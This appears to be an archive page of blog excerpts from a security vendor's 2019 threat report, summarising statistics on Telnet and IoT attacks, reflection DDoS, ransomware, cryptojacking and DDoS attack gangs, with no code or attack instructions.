2019 Cybersecurity Insights -16
August 19, 2020
In this section, we analyzed threats against three major protocols.
Threats Against Telnet
According to data from NSFOCUS’s threat hunting system, Telnet (available on port 23), targeted by a total of 120,000 attack sources, was the IoT protocol most favored by attackers1 . Figure 7-3 shows the activity trend of Telnet attack sources from March to October in 2019. We can see that the number of Telnet-based attacks increased month by month from March to August, with August seeing the most attack sources (over 60,000) that carried out more than 50,000 weak password detection activities. In addition, June witnessed the most sample download activities (more than 40,000). Overall, attack sources were on the decline in the latter half of 2019.
(more…)2019 Cybersecurity Insights -15
August 12, 2020
Finding 1: In 2019, over 30 types of IoT vulnerability exploits were captured, most of which targeted remote command execution vulnerabilities. Though hundreds of to thousands of IoT vulnerabilities are unveiled each year, only a few can exert an extensive impact. Attackers were keen on targeting devices (routers and video surveillance devices) exposed in large quantities, in a bid to broaden their influence.
Finding 2: IoT devices, especially cameras and routers, were major targets of Telnet weak password cracking attacks.
Finding 3: Since security researchers from Baidu disclosed that the Web Services Dynamic Discovery (WSD) protocol could be exploited for DDoS reflection attacks, there has been a notable increase in reflection attack events based on this protocol in the latter half of 2019. Since mid-August, WSD reflection attacks captured by us have been on the rise. Worse still, September has witnessed a sharp increase in such attacks. All parties concerned, including security vendors, service providers, and telecom carriers, should pay due attention to this type of threats.
Finding 4: Approximately 2.28 million IoT devices (port 1900) worldwide had the UPnP/SSDP service publicly accessible and were thus at risk of being exploited to launch DDoS attacks, an decrease of 22% from 2018.The UPnP port mapping service, exposed on about 390,000 IoT devices, was likely to be abused as a proxy or render intranet services accessible on the extranet.
(more…)2019 Cybersecurity Insights -14
August 5, 2020
Malware Threats from Mobile Platforms
Nowadays, smartphones are ubiquitous. Android, as a widely used mobile operating system, is vulnerable to an increasing large number of malware families owing to its openness and privilege issues. Such malware can even be spread via legal channels, including Google Store.
(more…)2019 Cybersecurity Insights -13
July 29, 2020
Cryptojacking Malware
In 2019, the pickup in cryptocurrency prices led to an increase in the number of cryptojacking malware families. Of all these families, Monero mining trojans still took a dominant place. EternalBlue and weak password cracking were the major methods for ransomware families to compromise large enterprises in financial and telecom sectors and spread themselves. At the same time, to defeat detection devices, cryptojacking malware families have been constantly upgraded to evolve into more variants that feature better stealth and a modular design.
(more…)2019 Cybersecurity Insights -12
July 22, 2020
Ransomware
In 2019, ransomware was still a major type of threats that haunted people around the world. The most prominent families were GlobeImposter, GandCrab, and WannaCry, which were extremely active and had far more variants than others. According to NSFOCUS Security Labs’ observation, the number of ransomware families and variants increased sharply in four months from May to August 2019, which was somewhat attributable to the soaring prices of major cryptocurrency types. These families used diverse compromise methods to attack a wide variety of sectors, posing a severe threat to organizations’ and individuals’ data. Through ongoing monitoring, NSFOCUS Security Labs finds that the following trends of ransomware took shape in 2019:
(more…)2019 Cybersecurity Insights -11
July 15, 2020
Cryptomining Traffic
Based on all sorts of security alert data from NSFOCUS Managed Security Service (MSS), we made a quantitative analysis of cryptomining activities and hosts in enterprises in 2019 and found that the cryptomining topicality is positively correlated with the cryptomining market trend.
(more…)2019 Cybersecurity Insights -10
July 10, 2020
Second Largest Gang by the Number of Attack Sources
The second largest gang in terms of the number of attack sources generated the largest traffic. This gang had 23,000 recidivists and favored volumetric SYN flood attacks. According to historical attack records, 99.54% of recidivists had resorted to this kind of attack. This gang stayed active from January to October and was at its busiest in May.
Figure 5-14 shows the monthly quantity trend of attack sources and attack targets of this gang. We can see that this gang remained active from January to October, having more attack sources in January, April, May, and June. On average, 6000 active attack sources launched attacks against seven targets each month.
(more…)2019 Cybersecurity Insights -9
July 8, 2020
In 2019, 7% of recidivists1 were responsible for 78% of DDoS attacks. Obviously, recidivists are too menacing to overlook. Several groups of DDoS recidivists often work together to initiate attacks. Such groups are collectively referred to as an “IP gang”. In 2019, a total of 60 DDoS gangs were detected, including 15 ones that contained more than 1000 attack sources. The largest gang, formidably, consisted of 88,000 attack sources. On average, 35,000 attack sources remained active every month. Therefore, we should keep vigilant on gang behavior and attack gangs. In this section, we will profile and analyze major attack gangs.
(more…)2019 Cybersecurity Insights -8
July 7, 2020
In 2019, most frequently seen attacks were UDP floods, SYN floods, and ACK floods, which together accounted for 82% of all DDoS attacks. By contrast, reflection attacks took up only 10%. Compared with 2018, reflection attacks rose slightly in number, but remained small in proportion.
(more…)2019 Cybersecurity Insights -7
July 3, 2020
Key Findings:
Maturity: The technical maturity of attackers keeps growing, opening more possibilities than DDoS attacks for attackers to garner profits.
Combination: Of all DDoS attacks in 2019, 12.5% employed multiple vectors. This percentage was even higher among super-sized attacks (> 300 Gbps) to reach more than one-third. These factors have posed a greater challenge to the performance of cleaning devices, the stability of cleaning lines, and the effectiveness of defense operations.
Recidivists: In 2019, a total of 1.3 million DDoS recidivists (involved in more than 20 attacks) were spotted, 7% of whom were responsible for 78% of attacks. Recidivist behavior deserves continuous attention.
Gangs: In 2019, a total of 60 DDoS gangs were detected, including 15 ones that contained more than 1000 attack sources. The largest gang, formidably, consisted of 88,000 attack sources. On average, 35,000 attack sources remained active every month. Therefore, we should keep vigilant on gang behavior and attack groups.
(more…)